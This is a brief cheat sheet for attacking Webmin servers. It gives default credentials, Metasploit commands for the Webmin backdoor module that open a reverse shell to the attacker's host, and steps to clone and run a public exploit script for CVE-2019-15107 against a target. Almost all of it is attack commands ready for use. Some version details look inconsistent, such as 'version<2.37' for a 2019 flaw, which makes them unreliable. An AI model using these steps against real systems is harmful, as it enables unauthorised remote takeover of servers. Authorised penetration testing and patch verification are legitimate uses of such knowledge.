Webmin Pentesting

Webmin is a web-based system administration tool for Unix. The default port is 10000.

Default Credentials

admin:admin

password_chagne.cgi Command Injection version=1.890

msfconsole
msf> use exploit/linux/http/webmin_backdoor
msf> set rhosts <target-ip>
msf> set lhost <local-ip>
msf> run
shell

Remote Code Execution (RCE) version\<2.37

Webmin version\<2.37 is vulnerable to remote code execution. Download the payload .

git clone https://github.com/MuirlandOracle/CVE-2019-15107
cd CVE-2019-15107
python3 CVE-2019-15107.py <target-ip>